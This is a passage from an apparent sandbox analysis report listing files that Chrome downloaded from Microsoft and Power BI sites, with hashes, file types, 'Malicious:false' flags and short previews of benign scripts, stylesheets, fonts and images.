                                                                                                                                                                                                          Preview:/*. Copyright (C) 2013-2015 by Andrea Giammarchi - @WebReflection.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):32
                                                                                                                                                                                                          Entropy (8bit):4.327819531114783
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Aq7KKlMT9:AqeKWT9
                                                                                                                                                                                                          MD5:A8A3710424DC6E0DFF393C6964441BDB
                                                                                                                                                                                                          SHA1:E4978066791DD394BDDD174F2687A7CDD43442B2
                                                                                                                                                                                                          SHA-256:46CD047CC0D3D10776E2F50D4C9D55DB58BD97D7A95B7D691F53D4937C71CF00
                                                                                                                                                                                                          SHA-512:EE135EE50868E59853C8FE57A9471AE1FBBDE30A929D33B4A4D56200E70C93AFDFF0301EF7FEBC803258C2BA2DCBC183E632B2ADA1745D3C87C1EEB98E8DEE62
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASHa8a3710424dc6e0dff393c6964441bdb.css
                                                                                                                                                                                                          Preview:[class*="z-"]{position:relative}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2750x1000, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):58314
                                                                                                                                                                                                          Entropy (8bit):7.972136313816049
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:ayQW6wVw18cwCwHb/K3JoprRLqVNOhMU2VH+BpKkbGV3+duwF2LhbaMruVIZZr:sYw1Z/w7lWNU2VH+Bpu+duwF6uVm
                                                                                                                                                                                                          MD5:85ED2E1EC55E11D3C996CE79821397C2
                                                                                                                                                                                                          SHA1:50EA39A97C5156EECFB5456E2778F4C8D9EC5ADA
                                                                                                                                                                                                          SHA-256:9F30C4B5CA95655555248699B6B1D65118EE36579BB966BA7CFE6E772F360749
                                                                                                                                                                                                          SHA-512:334BE8EC66B1BD0039A004D980495EFB0BBF2EC4A1A3A398BA5955928E5C806F41AEFB094B38EA7F43820300429B6C0F1E59D6FD1C44B0F40C709C53517497C9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .........*.......%...Il<..........H....q..k..Zi.?.......?.~....6.....J....i.......|o....a.x|..?]...o....?.z.<.......u...5.'.7.?..q...S....D...G.....?.>......{.....o....?..n..............4.......g...Oo.......f.....#.......s........a.....a...+...w.W........?A...7................s/.....?<.U.....?..K.[.../.o.z..w.................6.......?..m.........?...}..Q|..'._.../...?....M..._.................}.....?......_...7......~.z}~3....._..`...............................~........{..................?..._.>...?..O.<i.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.J..>..8.....n.....R.77..>d..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1.y.=.}.o...b~h.rgY..z.N.F...
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):17536
                                                                                                                                                                                                          Entropy (8bit):5.379461730103927
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:BKnhudjjyi8RNG+FH09zOrxWPuA7sd1T4v4NW7ZDCceHMLTwjgaopvZRB:sn4xjypZFH09zOrqs74v4o7hOY3aoD
                                                                                                                                                                                                          MD5:FE11D7E120969836694262F7E9169389
                                                                                                                                                                                                          SHA1:2560E2950F469C9ED208A527C0120CB02EB7DDE9
                                                                                                                                                                                                          SHA-256:AD6B2F2C981407F321B42486884E2BD5A13943DDBA6EF4D313D5902092026D1C
                                                                                                                                                                                                          SHA-512:90602725B58D618FF891669FB2CF24BB986CE9960A130242D0A31B41735714FB0F0CAB3210E74A83908A791E6BCBE43A4309DD18090FFF431BD49AC0B8878049
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/powerBISignOn.min.ad6716851749092af8e5.js
                                                                                                                                                                                                          Preview:"use strict";var marker;this.parseTimeMarkers=this.parseTimeMarkers||{},(marker=this.parseTimeMarkers["powerBISignOn.js"]||(this.parseTimeMarkers["powerBISignOn.js"]={})).startEval=window.jsCommon&&window.jsCommon.performance&&window.jsCommon.performance.now?window.jsCommon.performance.now():Date.now(),window.perfTracking&&window.perfTracking.startBundleEval&&window.perfTracking.startBundleEval("powerBISignOn.js"),function(){var l={d:function(r,n){for(var e in n)l.o(n,e)&&!l.o(r,e)&&Object.defineProperty(r,e,{enumerable:!0,get:n[e]})},o:function(r,n){return Object.prototype.hasOwnProperty.call(r,n)},r:function(r){typeof Symbol<"u"&&Symbol.toStringTag&&Object.defineProperty(r,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(r,"__esModule",{value:!0})}};!function(){if(typeof l<"u"){var r=l.u,n=l.e,e=new Map,t=new Map;l.u=function(i){return r(i)+(e.has(i)?"?"+e.get(i):"")},l.e=function(i){return n(i).catch(function(s){var o=t.has(i)?t.get(i):5;if(o<1){var u=r(i);throw s.message=
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3164)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):34401
                                                                                                                                                                                                          Entropy (8bit):5.567515913811421
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:xluaIaJW9ePBW/YfKbNckc0OFc0hLoSIbSZdfKGnRmSdgSJnsYXZeTnOki:XuioyA/7c0opLozb6RmCg6kTG
                                                                                                                                                                                                          MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                                                                                                          SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                                                                                                          SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                                                                                                          SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Web Open Font Format, TrueType, length 33881, version 0.-12452
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):33881
                                                                                                                                                                                                          Entropy (8bit):7.985183817248673
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:MRtJhOhCjquly8uzaE+02GDNBCggEx60RcrTo01k1dBl5jBmriykosI7F+pF+jSH:CDyVzjhLqgjqMh1dDWrNGUoIInczmetO
                                                                                                                                                                                                          MD5:9CCE65A288AD33BCA4C3983A72727D8D
                                                                                                                                                                                                          SHA1:8956D1F5B4190F53749736AC9711FC76F5E28BD3
                                                                                                                                                                                                          SHA-256:C8AE1941C0005E49DC92E79CE05B8F7DAA36C6960BC94FA80E15A83CD524EA63
                                                                                                                                                                                                          SHA-512:E1FC9A5E66B3F6A7179110C7781CEC5D6D45A875EF87033C665A154BCAC3BB50239519589DEC10DBD4A1B8E5C6F85EEDE17E53FB3EC9753AA074963DEBF33E59
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/fonts/SegoeUI-Regular-final.c7ffa71f9806b7e5d403.woff
                                                                                                                                                                                                          Preview:wOFF.......Y..........\....................LTSH.......u....j..pOS/2.......W...`JUv.VDMX...d........vX}.cmap.......^....6...cvt ...D........|.].fpgm.......D.....<*.gasp...T...........#glyf...d..O...z...G{hdmx..^........pp...head..f....6...6...Fhhea..g.... ...$...Bhmtx..g0...J......[&kern..i|..........loca..xD...f.....=^.maxp..z.... ... .U.)name..z....g... ....post..}4....... .Q.wprep..}H...h...@....x.UN... .3...b.S..[.1.b......[iT............Z...&.........Q...N.....v.)....g6../.......33.g..=(F...\...).....,...x.c`fQe......:....Q.B3_dHc..`e.feb.B&....} .b...`...........2.r,bb..3..X.Xg.)..6.&....x....x.........v..r..M..9"..#7.\!wH.$w..9r.....f6ffc.a.63...1._o...<...A.?|..0<..x.%.\..>..+._...^....,@A. ..;..(,....=....E(&.R.S...}J..%(m....,EYY.r..2.e)/?..,GEY.J...T..."+Q.r.L5Y..*5,.j..RKV....Z.:..Z...'?...C.{L]..z4..i,..6..e...c...4.G4..lJK.V.....-h#?..lI;...ek:.6t.m.d....lO.....|@'.....;.Cv...J/K.........ki....I.....k...}.2H.s..`K.........f....r.#.W...).0.R.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):6016
                                                                                                                                                                                                          Entropy (8bit):7.9278451274294195
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:+cLjJ2t8WtOrfsYBUp7LFXrhVViy0BzQ7QeK3GJPycOxcB5zsh41811Qnt:+Wt2tTGfsYKNL9rAekGJxOKOh4S110t
                                                                                                                                                                                                          MD5:F1866D5473CE8C4DCEA56088B8710733
                                                                                                                                                                                                          SHA1:A4BEADEEE35CE3FB580D8864076D65160FA0F84A
                                                                                                                                                                                                          SHA-256:00B4A7BADFFB0B73C7EC5BF892C22D373630AD869557254C011BA34C72465487
                                                                                                                                                                                                          SHA-512:FE98F206B8AF9BBD9CCC96579DCA710C1129CFBF6EEC73702884166204957CCBB3DA50DB2957BEB5A8EE49CF19B1DCDF85751ADD938C59BAE1CC41C7C5E23D90
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Use-Cases-BG?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=99&fit=constrain"
                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................f...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................nmdat.....*~.C.....2.,D...A.@.Y.TM]Cc..@.:p.....R..F6.W..k..cg8....K..G...i..%Z..FhO...P....C. B...V.*.f.............Q....._....<.H...n....D.r.kb.U..~..3..`]u...T.....@/..1...zb3.E..<....b......k\...7....$9,.....*Z!5....E[].....%...c.>..c..5..C=[. <......5....h...v.,...J0.l'^.D..^.$.3[....L..........uC...A9...+.~._}..!.....B.S..P....=S%.E.b ..:..C%.....N....E/u.....R.......?s`....c.bt.r.z.f.EkC..+YWm..NFW=.=.].YE.W.....r.!.R...7........7.....&..s.Q..8.b..........`]..CS}}..S...o.)......a.K.g...*`..g..D..\.{.@H....s3H+;.utN....S.y.9.\X..OZ,.T...4yI.K.aK..C\.y;.PFPE..9.f..^...q.R+/?.%........)!(. D./..g.).......!.....^I......JarD-l.9.E..Y....'.`c..hs*.....B-_..|.".G.g....e......u..8
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (771), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):771
                                                                                                                                                                                                          Entropy (8bit):5.093427874261161
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:c9nPyhtGoH4ciOrVHKTwNi1ckRypXw29sdRQ:WPyCoYcZV5NiId9sdRQ
                                                                                                                                                                                                          MD5:740AB27F1AF9A1E5AFC2B85BDB392A7A
                                                                                                                                                                                                          SHA1:40F115FB83C4C670C4AFA4E021F1A357587997F5
                                                                                                                                                                                                          SHA-256:F55C1AEA48174384D171024BF7F13402F9F264019F895A67C9090A021FD7C38D
                                                                                                                                                                                                          SHA-512:5FF8954209D348FC584662CC770CD2849CEB8E5A14D44838F1F3F8D30C7AE3115702B041F508C0075381E71A44D433F00307D3679DBF0F9E1103A19415344A3B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/stylelibrary.min.6081ab27e5415c8983f6.js
                                                                                                                                                                                                          Preview:!function(){"use strict";var t,n,r,i,c={856:function(t,n){Object.defineProperty(n,"__esModule",{value:!0}),n.StyleLibrary=void 0,n.StyleLibrary=function(){return function(){}}()}},s={};function a(t){var n=s[t];if(void 0!==n)return n.exports;var r=s[t]={exports:{}};return c[t](r,r.exports,a),r.exports}t=a.u,n=a.e,r=new Map,i=new Map,a.u=function(e){return t(e)+(r.has(e)?"?"+r.get(e):"")},a.e=function(e){return n(e).catch(function(_){var o=i.has(e)?i.get(e):5;if(o<1){var v=t(e);throw _.message="Loading chunk "+e+" failed after 5 retries.\n("+v+")",_.request=v,_}return new Promise(function(l){setTimeout(function(){var p=Date.now();r.set(e,p),i.set(e,o-1),l(a.e(e))},3e3)})})};var f={};Object.defineProperty(f,"__esModule",{value:!0}),a(856),window.stylelibrary=f}();
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):5009
                                                                                                                                                                                                          Entropy (8bit):4.532689799994779
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:O4y/XHFCgOX1a9eD7EjHSlEusxsWpcTcaUXHcKg4paUxwq9XRrlJNRCBs5KssHNK:OvXH2X1H7ySlEus2WpWG3cN4pHR9XXjl
                                                                                                                                                                                                          MD5:8F1B786599DDD1D6C94A1D907F2CB5FD
                                                                                                                                                                                                          SHA1:4E5B3082D74407777629A4EE2B5DCA1768FF0C5D
                                                                                                                                                                                                          SHA-256:20BF0322758485EE42D1480678AA5799087DAD8D0615AFCEF1448D0B34878AE3
                                                                                                                                                                                                          SHA-512:FF10A31D0A94A78BB05AF0738A28ED65580F0DF5FA13CE3E69609407EB9D174B351B2139228A926FB3747245190213E28DEEB3F4CD7CBACA281CFE3E9923B87E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/footnote/v2/footnote/clientlibs/site.min.ACSHASH8f1b786599ddd1d6c94a1d907f2cb5fd.js
                                                                                                                                                                                                          Preview:/*******************************************************************************. * Copyright 2018 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.(function() {. "use strict";.. let count = 0;. const prefix = "__footnote";.. /**. * Jumps to elements location without being hidden by the page navigation menu (if any). * @param {Event} event . * @param {JQuery Object} jumpToEleme
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):9316
                                                                                                                                                                                                          Entropy (8bit):4.267140948442776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:7GrOUjDYq5FEF/zj2wrEEegbSYCkK2MlXW2UqEcK9MwC1uAyI9J3Yullgubephg2:qrzjDYq5FEFLjRJpKJxWrqhKGXy83Y3N
                                                                                                                                                                                                          MD5:2B143BED0FF34BC70BC0703346F70E08
                                                                                                                                                                                                          SHA1:7FB14A8842293FD041C7C138285AC2F822AC4B4C
                                                                                                                                                                                                          SHA-256:C35BBDEE4A46BFBF552989E1126E1F09B454EB3DC2523376C38964BF6128BE86
                                                                                                                                                                                                          SHA-512:46BBF881243EC3C27046FCB66F9D8412B459CC7B6DA1ABF0DCB5F70D578F57E9A88D52431753B65F851892055AC17EDD9446E11BA67D7B0DA80B2B2615F67688
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEnabled() {. return !!(window.ocrReimagine?.Icon?.getInstances());. }.. /**. * Initialize popover elements with the class 'popover-rte-mount' by looking up inside the target element or entire document.. */. initializePopoverRichTextPlugin() {. if (!this.isPopoverComponentEnabled()) {. return;. }.. // Get all popover rich text elements.. const popoverRichTextElements = this.getPopoverRichTextElements();.. if (!popo
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (605)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):179808
                                                                                                                                                                                                          Entropy (8bit):5.556656445593751
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:xLp14+FgmOlITmhHDBrWnW+9BDI8nvtmmRHVi3J11HFaANDVDoO:xLp3EHDBrWW2BjvRREJPHFXNh
                                                                                                                                                                                                          MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                                                                                                                                                          SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                                                                                                                                                          SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                                                                                                                                                          SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';(()=>{function kc(a){a=!1===(a=void 0===a?!0:a)?null:gg;return a||((a=(a=(a="undefined"!==typeof globalThis?globalThis:a)||"undefined"===typeof self?a:self)||"undefined"===typeof window?a:window)||"undefined"===typeof Sc.g||(a=Sc.g),gg=a),a}function se(a){function b(){}var c;if(hg)a=hg(a);else if(null==a)a={};else{if("object"!==(c=typeof a)&&c!==yc)throw new TypeError("Object prototype may only be an Object:"+a);a=(b.prototype=a,new b)}return a}function Sa(a,b){function c(){this.constructor=.a}if(typeof b!==yc&&null!==b)throw new TypeError("Class extends value "+String(b)+" is not a constructor or null");ig(a,b);a.prototype=null===b?se(b):(c.prototype=b.prototype,new c)}function jg(a,b){for(var c=0,d=b.length,e=a.length;c<d;c++,e++)a[e]=b[c];return a}function Gb(a,b){return a&&ud.prototype.hasOwnProperty.call(a,b)}function vd(a){return a&&(a===ud.prototype||a===Array.prototype)}function te(a){return vd(a)||a===Function.prototype}function lc(a){if(a){if(Tc)return Tc(a);var
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (15109), with CRLF line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):15382
                                                                                                                                                                                                          Entropy (8bit):5.508812347355701
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ocEnBwu5N7/EH6S7e1SlQswbnWzOyphnV2pKAZoLv:nGf7/EL7+zWAZk
                                                                                                                                                                                                          MD5:BC5E72E8CE083D46ADB43848B3E75434
                                                                                                                                                                                                          SHA1:8E8EC43AF69CF3D5D7AA2C507A443893C1C77BB5
                                                                                                                                                                                                          SHA-256:4626C0FC01A26A8061936336C4A9F252B78C0272CE6BD1D4EE849985807355CE
                                                                                                                                                                                                          SHA-512:F21159BA8E45672E67E743927074433C5DB22DD7BB76F406D413AABC0A97A978C7256A4E344A9C5AFD12F57C2EE92374B115CE1074A6958FAC8A0D3394D57A99
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/jquery.globalize/globalize.min.8e8ec43af69cf3d5d7aa.js
                                                                                                                                                                                                          Preview:/*! globalize - v0.1.0pre - 2012-10-18..* http://wiki.jqueryui.com/Globalize..* Copyright 2012 ; Licensed MIT */..(function(e,t){var n,r,i,s,o,u,a,f,l,c,h,p,d,v,m,g,y,b,w,E,S,x,T,N;n=function(e){return new n.prototype.init(e)},typeof require!="undefined"&&typeof exports!="undefined"&&typeof module!="undefined"?module.exports=n:e.Globalize=n,n.cultures={},n.prototype={constructor:n,init:function(e){return this.cultures=n.cultures,this.cultureSelector=e,this}},n.prototype.init.prototype=n.prototype,n.cultures["default"]={name:"en",englishName:"English",nativeName:"English",isRTL:!1,language:"en",numberFormat:{pattern:["-n"],decimals:2,",":",",".":".",groupSizes:[3],"+":"+","-":"-",NaN:"NaN",negativeInfinity:"-Infinity",positiveInfinity:"Infinity",percent:{pattern:["-n %","n %"],decimals:2,groupSizes:[3],",":",",".":".",symbol:"%"},currency:{pattern:["($n)","$n"],decimals:2,groupSizes:[3],",":",",".":".",symbol:"$"}},calendars:{standard:{name:"Gregorian_USEnglish","/":"/",":":":",firstDay
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):56755
                                                                                                                                                                                                          Entropy (8bit):4.772033509869393
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:md21iWKHFZV8rQ9KiY2pYhp10npm7Kc1DP:md21QHHAP
                                                                                                                                                                                                          MD5:4AB0EEDAB0BA9025FAA176C16F80B8B4
                                                                                                                                                                                                          SHA1:1F099577B7BD33E3FA02B9D13E19F7A1126E36B8
                                                                                                                                                                                                          SHA-256:3595DE3D23938FCC8107D8811EE9806BA642C235BF0EB9073B99AE3A0C5D62DE
                                                                                                                                                                                                          SHA-512:F293BF08DA53E3A01C0CE65CEFD4F3D680B9AE7375EEC13D92FB1FEFEE7CEA975C0916C895D31CBAEF535BF5914BBAF14EC5639D3EB6B670A8798094A9E39BD9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:(function () {. /** Check if OneCloud Reimagine namespace exists */. if (!window.ocReimagine) {. window.ocReimagine = {};. }.. /** Create product price module namespace */. if (!window.ocReimagine.ProductPriceModule) {. window.ocReimagine.ProductPriceModule = {};. }.. /** Initializes the reimagine product pricing manager and services */. function initializeProductPriceModule() {. try {. // Check if product pricing manager instance exists. if (window.ocReimagine && window.ocReimagine.ProductPriceModule && window.ocReimagine.ProductPriceModule.PricingManagerInstance) {. // If it exists, that means it has already been initialized so no need to re-initialize. return;. }.. window.ocReimagine.ProductPriceModule.PricingManagerInstance = new window.ocReimagine.ProductPriceModule.ProductPricingManager();. }. catch (error) {. }. }.. /**. * By defau
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):4488
                                                                                                                                                                                                          Entropy (8bit):7.89532602480277
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:+cLjBMCQfeYCk5J45Xfu8Su1gRS+whcmSFk7uhQefhkcoh:+W13QfeWLqvugGR9w9L7ZEhs
                                                                                                                                                                                                          MD5:BC2514550A7FF0F5A460B7B26947D3F6
                                                                                                                                                                                                          SHA1:40BF03FA8485475A25AD59B01C7C29E2BDB95F51
                                                                                                                                                                                                          SHA-256:89609F82D6181F230251FF98335CFBF87A3EA265F94563783C67B958A9713999
                                                                                                                                                                                                          SHA-512:C98885230DAACC8CCF00239C3BEE66541331D78C3D39869616E2345BC705B419E96090C4623887219685D90B5730B3E3822717648EB23AAF1D80649A8C966FA0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_X?scl=1
                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................n...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................vmdat........h...B2. ....T#......Idp.<.6.-..,.......A.T...<..t...G.s.A.....\...\.;...?..q.....ei .....6.K..f+..;.\..........$C..kl.T|.3/..9.9...$..=.~.-R%...d.;......,....h...7.....X2..(..2..0...D1$.G.(.....L....:[...B.U.HM.7.[4"..jA.@...^.N.O>.a..J.r.Z..^d...;sx.....GR<.Y/..F2..1_..lFRS.T...^0O.."...x..$.N..}.Z..)...n't*7..p..K.g.p....p.W_..$F^-.<...hiD.`...$#S.k..J .!.+.f..0...).......\...........K..K.W\U..E.E.".A.P......b.P......{.......[..L..~.......5..`......Z..]...4..*.<...T&.......eV..~>"l...~.W.].b.stw...}....1Mi2WbG.M.v...t...P..C&&...&z./..O.......}w..0.m..G....F$.0.....Y.=N...Yi..j8^Z.s....c....W....{....`K4.)...M........d.T.3>+....ys >.p..0.-.._.].2/..k.I.0. .>9hV...
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (605)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):179808
                                                                                                                                                                                                          Entropy (8bit):5.556656445593751
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:xLp14+FgmOlITmhHDBrWnW+9BDI8nvtmmRHVi3J11HFaANDVDoO:xLp3EHDBrWW2BjvRREJPHFXNh
                                                                                                                                                                                                          MD5:C3AEC3D03BC5447975E3EE25B53F6C32
                                                                                                                                                                                                          SHA1:353F68C0F6DF93888427E40135CF2DBF517F6FD0
                                                                                                                                                                                                          SHA-256:72FBAC0EA8A0FF74E7ABE2E24FB992885AC904A3C1C579387E97654DD9C535BA
                                                                                                                                                                                                          SHA-512:7D0E3CE67B84B7C1BBFC4511623426D68DE11D90BBEFF026013424C17D810CB59C75CD0754DD3A8AD9D3E27ED9620C9A6B92E2D7188C03845B0C3CC0E72951A1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/custom-oneds.min.ACSHASHc3aec3d03bc5447975e3ee25b53f6c32.js
